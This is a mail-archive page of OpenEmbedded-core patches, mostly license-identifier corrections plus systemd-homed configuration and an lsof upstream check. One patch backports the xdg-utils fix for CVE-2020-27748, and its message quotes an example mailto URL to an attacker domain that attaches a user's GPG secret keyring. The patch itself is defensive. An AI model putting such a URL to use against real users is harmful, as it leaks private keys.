If systemd is built with fdisk support[1] and the openssl and cryptsetup PACKAGECONFIG are enabled, systemd-homed[1] is automatically enabled. The org.freedesktop.home1.conf file was forgotten, so this commit adds the file and make enabling homed a explicit choice. [1] Automatically enabled if the fdisk dependency is installed which it is as util-linux is pulled in by systemd [2] https://www.freedesktop.org/software/systemd/man/systemd-homed.service.html Signed-off-by: Kristian Klausen --- meta/recipes-core/systemd/systemd_249.3.bb | 5 + 1 file changed, 5 insertions(+) diff --git a/meta/recipes-core/systemd/systemd_249.3.bb b/meta/recipes-core/systemd/systemd_249.3.bb index c2d4343f10..bebb608db1 100644 --- a/meta/recipes-core/systemd/systemd_249.3.bb +++ b/meta/recipes-core/systemd/systemd_249.3.bb @@ -133,6 +133,7 @@ PACKAGECONFIG[gnu-efi] = "-Dgnu-efi=true -Defi-libdir=${STAGING_LIBDIR} -Defi-in PACKAGECONFIG[elfutils] = "-Delfutils=true,-Delfutils=false,elfutils" PACKAGECONFIG[firstboot] = "-Dfirstboot=true,-Dfirstboot=false" PACKAGECONFIG[repart] = "-Drepart=true,-Drepart=false" +PACKAGECONFIG[homed] = "-Dhomed=true,-Dhomed=false" # Sign the journal for anti-tampering PACKAGECONFIG[gcrypt] = "-Dgcrypt=true,-Dgcrypt=false,libgcrypt" PACKAGECONFIG[gnutls] = "-Dgnutls=true,-Dgnutls=false,gnutls" @@ -619,6 +620,7 @@ FILES:${PN} = " ${base_bindir}/* \ ${datadir}/dbus-1/system.d/org.freedesktop.timesync1.conf \ ${datadir}/dbus-1/system.d/org.freedesktop.portable1.conf \ ${datadir}/dbus-1/system.d/org.freedesktop.oom1.conf \ +${datadir}/dbus-1/system.d/org.freedesktop.home1.conf \ " FILES:${PN}-dev += "${base_libdir}/security/*.la ${datadir}/dbus-1/interfaces/ ${sysconfdir}/rpm/macros.systemd" @@ -717,6 +719,9 @@ python __anonymous() { if bb.utils.contains('PACKAGECONFIG', 'repart', True, False, d) and not bb.utils.contains('PACKAGECONFIG', 'openssl', True, False, d): bb.error("PACKAGECONFIG[repart] requires PACKAGECONFIG[openssl]") + +if bb.utils.contains('PACKAGECONFIG', 'homed', True, False, d) and not bb.utils.contains('PACKAGECONFIG', 'openssl cryptsetup', True, False, d): +bb.error("PACKAGECONFIG[homed] requires PACKAGECONFIG[openssl] and PACKAGECONFIG[cryptsetup]") } python do_warn_musl() { -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155667): https://lists.openembedded.org/g/openembedded-core/message/155667 Mute This Topic: https://lists.openembedded.org/mt/85351936/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH] xdg-utils: Add fix for CVE-2020-27748
Backport an upstream patch for the CVE. Signed-off-by: Richard Purdie --- ...9813e0eb0246f63b54e9e154970e609575af.patch | 58 +++ .../xdg-utils/xdg-utils_1.1.3.bb | 1 + 2 files changed, 59 insertions(+) create mode 100644 meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch new file mode 100644 index 000..948b9e22e93 --- /dev/null +++ b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch @@ -0,0 +1,58 @@ +From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= +Date: Tue, 18 Aug 2020 16:52:24 +0100 +Subject: [PATCH] xdg-email: remove attachment handling from mailto +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This allows attacker to extract secrets from users: + +mailto:s...@evil.com?attach=/.gnupg/secring.gpg + +See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425 +and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177 + +Signed-off-by: Jörg Thalheim +--- + scripts/xdg-email.in | 7 +-- + 1 file changed, 1 insertion(+), 6 deletions(-) + +Upstream-Status: Backport +CVE: CVE-2020-27748 + +diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in +index 6db58ad..5d2f4f3 100644 +--- a/scripts/xdg-email.in b/scripts/xdg-email.in +@@ -32,7 +32,7 @@ _USAGE + + run_thunderbird() + { +-local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH ++local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY + THUNDERBIRD="$1" + MAILTO=$(echo "$2" | sed 's/^mailto://') + echo "$MAILTO" | grep -qs "^?" +@@ -48,7 +48,6 @@ run_thunderbird() + BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')) + SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1) + BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1) +-ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//')) + + if [ -z "$TO" ] ; then + NEWMAILTO= +@@ -68,10 +67,6 @@ run_thunderbird() + NEWMAILTO="${NEWMAILTO},$BODY" + fi + +-if [ -n "$ATTACH" ] ; then +-NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'" +-fi +- + NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//') + DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\"" + "$THUNDERBIRD" -compose "$NEWMAILTO" +-- +GitLab + diff --git a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb index 108e7b8c4c2..73acf6b744e 100644 --- a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb +++ b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb @@ -20,6 +20,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014" SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \ file://0001-Reinstate-xdg-terminal.patch \ file://0001-Don-t-build-the-in-script-manual.patch \ + file://1f199813e0eb0246f63b54e9e154970e609575af.patch \ " SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff" -- 2.32.0 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155666): https://lists.openembedded.org/g/openembedded-core/message/155666 Mute This Topic: https://lists.openembedded.org/mt/85351591/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH 14/14] recipetool/create_buildsys_python: treat BSD as BSD-3-Clause
The PyPI license classifiers include "OSI Approved: BSD", which does not specify which of the many variations of BSD license it actually means. The generic "BSD" license in the oe-core set is actually BSD-3-Clause. >From a random sample of ten PyPI modules that use "BSD", they are all BSD-3-Clause. As we expect the recipe maintainer to verify the license anyway, and this matches the previous license text, explicitly set the license to BSD-3-Clause. Signed-off-by: Ross Burton --- scripts/lib/recipetool/create_buildsys_python.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scripts/lib/recipetool/create_buildsys_python.py b/scripts/lib/recipetool/create_buildsys_python.py index 8aa44650d33..0b6b042ed17 100644 --- a/scripts/lib/recipetool/create_buildsys_python.py +++ b/scripts/lib/recipetool/create_buildsys_python.py @@ -101,7 +101,7 @@ class PythonRecipeHandler(RecipeHandler): 'License :: OSI Approved :: Apple Public Source License': 'APSL', 'License :: OSI Approved :: Artistic License': 'Artistic', 'License :: OSI Approved :: Attribution Assurance License': 'AAL', -'License :: OSI Approved :: BSD License': 'BSD', +'License :: OSI Approved :: BSD License': 'BSD-3-Clause', 'License :: OSI Approved :: Common Public License': 'CPL', 'License :: OSI Approved :: Eiffel Forum License': 'EFL', 'License :: OSI Approved :: European Union Public Licence 1.0 (EUPL 1.0)': 'EUPL-1.0', -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155665): https://lists.openembedded.org/g/openembedded-core/message/155665 Mute This Topic: https://lists.openembedded.org/mt/85351460/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH 13/14] hdparm: set correct license
The bulk of hdparm is under a unique license. Set the correct BSD version, and specify that the hdparm license is also used. Signed-off-by: Ross Burton --- meta/recipes-extended/hdparm/hdparm_9.62.bb | 7 --- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/meta/recipes-extended/hdparm/hdparm_9.62.bb b/meta/recipes-extended/hdparm/hdparm_9.62.bb index 3d4081c2b3d..61bb44ff389 100644 --- a/meta/recipes-extended/hdparm/hdparm_9.62.bb +++ b/meta/recipes-extended/hdparm/hdparm_9.62.bb @@ -4,10 +4,11 @@ DESCRIPTION = "hdparm is a Linux shell utility for viewing \ and manipulating various IDE drive and driver parameters." SECTION = "console/utils" -LICENSE = "BSD & GPLv2" -LICENSE:${PN} = "BSD" -LICENSE:${PN}-dbg = "BSD" +LICENSE = "BSD-2-Clause & GPLv2 & hdparm" +LICENSE:${PN} = "BSD-2-Clause & hdparm" +LICENSE:${PN}-dbg = "BSD-2-Clause & hdparm" LICENSE:wiper = "GPLv2" +NO_GENERIC_LICENSE[hdparm] = "LICENSE.TXT" LIC_FILES_CHKSUM = "file://LICENSE.TXT;md5=495d03e50dc6c89d6a30107ab0df5b03 \ file://debian/copyright;md5=a82d7ba3ade9e8ec902749db98c592f3 \ -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155664): https://lists.openembedded.org/g/openembedded-core/message/155664 Mute This Topic: https://lists.openembedded.org/mt/85351459/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH 12/14] ffmpeg: update LICENSE
"BSD" is ambiguous, ffmpeg comprises of several licenses which are BSD-like. Signed-off-by: Ross Burton --- meta/recipes-multimedia/ffmpeg/ffmpeg_4.4.bb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg_4.4.bb b/meta/recipes-multimedia/ffmpeg/ffmpeg_4.4.bb index e19077541ec..f822ba9ab78 100644 --- a/meta/recipes-multimedia/ffmpeg/ffmpeg_4.4.bb +++ b/meta/recipes-multimedia/ffmpeg/ffmpeg_4.4.bb @@ -5,7 +5,7 @@ DESCRIPTION = "FFmpeg is the leading multimedia framework, able to decode, encod HOMEPAGE = "https://www.ffmpeg.org/; SECTION = "libs" -LICENSE = "BSD & GPLv2+ & LGPLv2.1+ & MIT" +LICENSE = "GPLv2+ & LGPLv2.1+ & ISC & Expat & BSD-2-Clause & BSD-3-Clause & IJG" LICENSE:${PN} = "GPLv2+" LICENSE:libavcodec = "${@bb.utils.contains('PACKAGECONFIG', 'gpl', 'GPLv2+', 'LGPLv2.1+', d)}" LICENSE:libavdevice = "${@bb.utils.contains('PACKAGECONFIG', 'gpl', 'GPLv2+', 'LGPLv2.1+', d)}" -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155663): https://lists.openembedded.org/g/openembedded-core/message/155663 Mute This Topic: https://lists.openembedded.org/mt/85351458/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH 11/14] ppp: set precise BSD license
"BSD" is ambiguous, use the precise licenses BSD-3-Clause-Attribution and BSD-3-Clause. Signed-off-by: Ross Burton --- meta/recipes-connectivity/ppp/ppp_2.4.9.bb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/meta/recipes-connectivity/ppp/ppp_2.4.9.bb b/meta/recipes-connectivity/ppp/ppp_2.4.9.bb index 6e5cfc8f912..023d0feca99 100644 --- a/meta/recipes-connectivity/ppp/ppp_2.4.9.bb +++ b/meta/recipes-connectivity/ppp/ppp_2.4.9.bb @@ -5,7 +5,7 @@ SECTION = "console/network" HOMEPAGE = "http://samba.org/ppp/; BUGTRACKER = "http://ppp.samba.org/cgi-bin/ppp-bugs; DEPENDS = "libpcap openssl virtual/crypt" -LICENSE = "BSD & GPLv2+ & LGPLv2+ & PD" +LICENSE = "BSD-3-Clause & BSD-3-Clause-Attribution & GPLv2+ & LGPLv2+ & PD" LIC_FILES_CHKSUM = "file://pppd/ccp.c;beginline=1;endline=29;md5=e2c43fe6e81ff77d87dc9c290a424dea \ file://pppd/plugins/passprompt.c;beginline=1;endline=10;md5=3bcbcdbf0e369c9a3e0b8c8275b065d8 \ file://pppd/tdb.c;beginline=1;endline=27;md5=4ca3a9991b011038d085d6675ae7c4e6 \ -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155662): https://lists.openembedded.org/g/openembedded-core/message/155662 Mute This Topic: https://lists.openembedded.org/mt/85351457/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH 09/14] shadow-sysroot: sync license with shadow
This recipe is just a single data file from shadow, but as we can't easily tell what license that specific file is under just copy the full license statement. Signed-off-by: Ross Burton --- meta/recipes-extended/shadow/shadow-sysroot_4.6.bb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb b/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb index 1f6232e43c4..e05fa237a24 100644 --- a/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb +++ b/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb @@ -2,7 +2,7 @@ SUMMARY = "Shadow utils requirements for useradd.bbclass" HOMEPAGE = "http://github.com/shadow-maint/shadow; BUGTRACKER = "http://github.com/shadow-maint/shadow/issues; SECTION = "base utils" -LICENSE = "BSD | Artistic-1.0" +LICENSE = "BSD-3-Clause | Artistic-1.0" LIC_FILES_CHKSUM = "file://login.defs_shadow-sysroot;md5=25e2f2de4dfc8f966ac5cdfce45cd7d5" DEPENDS = "base-passwd" -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155660): https://lists.openembedded.org/g/openembedded-core/message/155660 Mute This Topic: https://lists.openembedded.org/mt/85351455/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH 10/14] ovmf: set precise BSD license
"BSD" is ambiguous, use the precise license BSD-2-Clause-Patent. Signed-off-by: Ross Burton --- meta/recipes-core/ovmf/ovmf_git.bb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/meta/recipes-core/ovmf/ovmf_git.bb b/meta/recipes-core/ovmf/ovmf_git.bb index 145240e77e8..4caf258e39f 100644 --- a/meta/recipes-core/ovmf/ovmf_git.bb +++ b/meta/recipes-core/ovmf/ovmf_git.bb @@ -2,8 +2,8 @@ SUMMARY = "OVMF - UEFI firmware for Qemu and KVM" DESCRIPTION = "OVMF is an EDK II based project to enable UEFI support for \ Virtual Machines. OVMF contains sample UEFI firmware for QEMU and KVM" HOMEPAGE = "https://github.com/tianocore/tianocore.github.io/wiki/OVMF; -LICENSE = "BSD-2-Clause" -LICENSE:class-target = "${@bb.utils.contains('PACKAGECONFIG', 'secureboot', 'BSD & OpenSSL', 'BSD', d)}" +LICENSE = "BSD-2-Clause-Patent" +LICENSE:class-target = "${@bb.utils.contains('PACKAGECONFIG', 'secureboot', 'BSD-2-Clause-Patent & OpenSSL', 'BSD-2-Clause-Patent', d)}" LIC_FILES_CHKSUM = "file://OvmfPkg/License.txt;md5=06357ddc23f46577c2aeaeaf7b776d65" # Enabling Secure Boot adds a dependency on OpenSSL and implies -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155661): https://lists.openembedded.org/g/openembedded-core/message/155661 Mute This Topic: https://lists.openembedded.org/mt/85351456/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH 08/14] valgrind: set precise BSD license
"BSD" is ambiguous, use the precise license BSD-3-Clause. Signed-off-by: Ross Burton --- meta/recipes-devtools/valgrind/valgrind_3.17.0.bb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/meta/recipes-devtools/valgrind/valgrind_3.17.0.bb b/meta/recipes-devtools/valgrind/valgrind_3.17.0.bb index 2805ad0eb31..3fa483d8bc0 100644 --- a/meta/recipes-devtools/valgrind/valgrind_3.17.0.bb +++ b/meta/recipes-devtools/valgrind/valgrind_3.17.0.bb @@ -2,7 +2,7 @@ SUMMARY = "Valgrind memory debugger and instrumentation framework" HOMEPAGE = "http://valgrind.org/; DESCRIPTION = "Valgrind is an instrumentation framework for building dynamic analysis tools. There are Valgrind tools that can automatically detect many memory management and threading bugs, and profile your programs in detail." BUGTRACKER = "http://valgrind.org/support/bug_reports.html; -LICENSE = "GPLv2 & GPLv2+ & BSD" +LICENSE = "GPLv2 & GPLv2+ & BSD-3-Clause" LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ file://include/pub_tool_basics.h;beginline=6;endline=29;md5=41c410e8d3f305aee7aaa666b2e4f366 \ file://include/valgrind.h;beginline=1;endline=56;md5=ad3b317f3286b6b704575d9efe6ca5df \ -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155659): https://lists.openembedded.org/g/openembedded-core/message/155659 Mute This Topic: https://lists.openembedded.org/mt/85351454/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH 07/14] libxfont: set precise BSD license
"BSD" is ambiguous, use the precise license BSD-3-Clause. Note that the actual license text is BSD 4-Clause with clause 3 rescinded: https://gitlab.freedesktop.org/xorg/lib/libxfont/-/blob/master/COPYING#L157 Signed-off-by: Ross Burton --- meta/recipes-graphics/xorg-lib/libxfont_1.5.4.bb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/meta/recipes-graphics/xorg-lib/libxfont_1.5.4.bb b/meta/recipes-graphics/xorg-lib/libxfont_1.5.4.bb index 94c6c66e878..f04780cf046 100644 --- a/meta/recipes-graphics/xorg-lib/libxfont_1.5.4.bb +++ b/meta/recipes-graphics/xorg-lib/libxfont_1.5.4.bb @@ -6,7 +6,7 @@ such as freetype)." require xorg-lib-common.inc -LICENSE = "MIT & MIT-style & BSD" +LICENSE = "MIT & MIT-style & BSD-3-Clause" LIC_FILES_CHKSUM = "file://COPYING;md5=a46c8040f2f737bcd0c435feb2ab1c2c" DEPENDS += "freetype xtrans xorgproto libfontenc zlib" -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155658): https://lists.openembedded.org/g/openembedded-core/message/155658 Mute This Topic: https://lists.openembedded.org/mt/85351453/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH 06/14] dev-manual/common-tasks: sync libxpm fragment with the recipe
Specifically, the actual recipe now has LICENSE=MIT. Signed-off-by: Ross Burton --- documentation/dev-manual/common-tasks.rst | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/dev-manual/common-tasks.rst b/documentation/dev-manual/common-tasks.rst index 4a5011ea749..dba0885110d 100644 --- a/documentation/dev-manual/common-tasks.rst +++ b/documentation/dev-manual/common-tasks.rst @@ -2361,7 +2361,7 @@ into separate packages:: require xorg-lib-common.inc SUMMARY = "Xpm: X Pixmap extension library" - LICENSE = "BSD" + LICENSE = "MIT" LIC_FILES_CHKSUM = "file://COPYING;md5=51f4270b012ecd4ab1a164f5f4ed6cf7" DEPENDS += "libxext libsm libxt" PE = "1" -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155657): https://lists.openembedded.org/g/openembedded-core/message/155657 Mute This Topic: https://lists.openembedded.org/mt/85351452/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH 05/14] oeqa/recipeutils: update for license change to python-async-test
The python-async-test recipe is now BSD-3-Clause. Signed-off-by: Ross Burton --- meta/lib/oeqa/selftest/cases/recipeutils.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/meta/lib/oeqa/selftest/cases/recipeutils.py b/meta/lib/oeqa/selftest/cases/recipeutils.py index 97edad88b57..f1dd63f65b4 100644 --- a/meta/lib/oeqa/selftest/cases/recipeutils.py +++ b/meta/lib/oeqa/selftest/cases/recipeutils.py @@ -40,7 +40,7 @@ class RecipeUtilsTests(OESelftestTestCase): SUMMARY = "Python framework to process interdependent tasks in a pool of workers" HOMEPAGE = "http://github.com/gitpython-developers/async; SECTION = "devel/python" --LICENSE = "BSD" +-LICENSE = "BSD-3-Clause" +LICENSE = "something" LIC_FILES_CHKSUM = "file://PKG-INFO;beginline=8;endline=8;md5=88df8e78b9edfd744953862179f2d14e" -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155655): https://lists.openembedded.org/g/openembedded-core/message/155655 Mute This Topic: https://lists.openembedded.org/mt/85351450/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH 03/14] xinetd: correct LICENSE
The xinetd license is superficially BSD-like, but it isn't BSD. Now that we have the full SPDX license set in oe-core, use the specific xinetd license. Signed-off-by: Ross Burton --- meta/recipes-extended/xinetd/xinetd_2.3.15.4.bb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/meta/recipes-extended/xinetd/xinetd_2.3.15.4.bb b/meta/recipes-extended/xinetd/xinetd_2.3.15.4.bb index e6ef5cf8b9a..30eec9c2734 100644 --- a/meta/recipes-extended/xinetd/xinetd_2.3.15.4.bb +++ b/meta/recipes-extended/xinetd/xinetd_2.3.15.4.bb @@ -2,9 +2,7 @@ SUMMARY = "Socket-based service activation daemon" HOMEPAGE = "https://github.com/xinetd-org/xinetd; DESCRIPTION = "xinetd is a powerful replacement for inetd, xinetd has access control mechanisms, extensive logging capabilities, the ability to make services available based on time, can place limits on the number of servers that can be started, and has deployable defence mechanisms to protect against port scanners, among other things." -# xinetd is a BSD-like license -# Apple and Gentoo say BSD here. -LICENSE = "BSD" +LICENSE = "xinet" LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=55c5fdf02cfcca3fc9621b6f2ceae10f" UPSTREAM_CHECK_GITTAGREGEX = "(?P\d+(\.\d+)+)" -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155656): https://lists.openembedded.org/g/openembedded-core/message/155656 Mute This Topic: https://lists.openembedded.org/mt/85351451/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH 04/14] selftest/python-async-test: set precise BSD license
"BSD" is ambiguous, use the precise license BSD-3-Clause. Signed-off-by: Ross Burton --- meta-selftest/recipes-devtools/python/python-async-test.inc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/meta-selftest/recipes-devtools/python/python-async-test.inc b/meta-selftest/recipes-devtools/python/python-async-test.inc index 439a0b9276a..6d7c7458b03 100644 --- a/meta-selftest/recipes-devtools/python/python-async-test.inc +++ b/meta-selftest/recipes-devtools/python/python-async-test.inc @@ -1,7 +1,7 @@ SUMMARY = "Python framework to process interdependent tasks in a pool of workers" HOMEPAGE = "http://github.com/gitpython-developers/async; SECTION = "devel/python" -LICENSE = "BSD" +LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://PKG-INFO;beginline=8;endline=8;md5=88df8e78b9edfd744953862179f2d14e" inherit pypi -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155653): https://lists.openembedded.org/g/openembedded-core/message/155653 Mute This Topic: https://lists.openembedded.org/mt/85351448/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH 02/14] lsof: add upstream check
Upstream has moved to GitHub. Whilst it's now too late to upgrade to the latest release, we can add upstream check variables so that we get notified we're out of date. Signed-off-by: Ross Burton --- meta/recipes-extended/lsof/lsof_4.91.bb | 3 +++ 1 file changed, 3 insertions(+) diff --git a/meta/recipes-extended/lsof/lsof_4.91.bb b/meta/recipes-extended/lsof/lsof_4.91.bb index 7c85bf23fc3..d7428ea2c49 100644 --- a/meta/recipes-extended/lsof/lsof_4.91.bb +++ b/meta/recipes-extended/lsof/lsof_4.91.bb @@ -18,6 +18,9 @@ SRC_URI = "http://www.mirrorservice.org/sites/lsof.itap.purdue.edu/pub/tools/uni SRC_URI[md5sum] = "148ed410cb52e08c2adc0c60f480f11f" SRC_URI[sha256sum] = "c9da946a525fbf82ff80090b6d1879c38df090556f3fe0e6d782cb44172450a3" +UPSTREAM_CHECK_URI = "https://github.com/lsof-org/lsof/releases/; +UPSTREAM_CHECK_REGEX = "lsof_(?P.*)\.linux\.tar" + LOCALSRC = "file://${WORKDIR}/lsof_${PV}/lsof_${PV}_src.tar" S = "${WORKDIR}/lsof_${PV}_src" -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155654): https://lists.openembedded.org/g/openembedded-core/message/155654 Mute This Topic: https://lists.openembedded.org/mt/85351449/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH 01/14] lsof: correct LICENSE
The lsof LICENSE is superficially BSD-like, but it isn't BSD. Now that we have the full SPDX license set in oe-core, use Spencer-94. Signed-off-by: Ross Burton --- meta/recipes-extended/lsof/lsof_4.91.bb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/meta/recipes-extended/lsof/lsof_4.91.bb b/meta/recipes-extended/lsof/lsof_4.91.bb index b3adfd57afa..7c85bf23fc3 100644 --- a/meta/recipes-extended/lsof/lsof_4.91.bb +++ b/meta/recipes-extended/lsof/lsof_4.91.bb @@ -3,7 +3,7 @@ DESCRIPTION = "Lsof is a Unix-specific diagnostic tool. \ Its name stands for LiSt Open Files, and it does just that." HOMEPAGE = "http://people.freebsd.org/~abe/; SECTION = "devel" -LICENSE = "BSD" +LICENSE = "Spencer-94" LIC_FILES_CHKSUM = "file://00README;beginline=645;endline=679;md5=964df275d26429ba3b39dbb9f205172a" # Upstream lsof releases are hosted on an ftp server which times out download -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155652): https://lists.openembedded.org/g/openembedded-core/message/155652 Mute This Topic: https://lists.openembedded.org/mt/85351447/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
Re: [OE-core] [RFC][PATCH] default-distrovars.inc: Set BBINCLUDELOGS to empty to disable printing failed task output multiple times
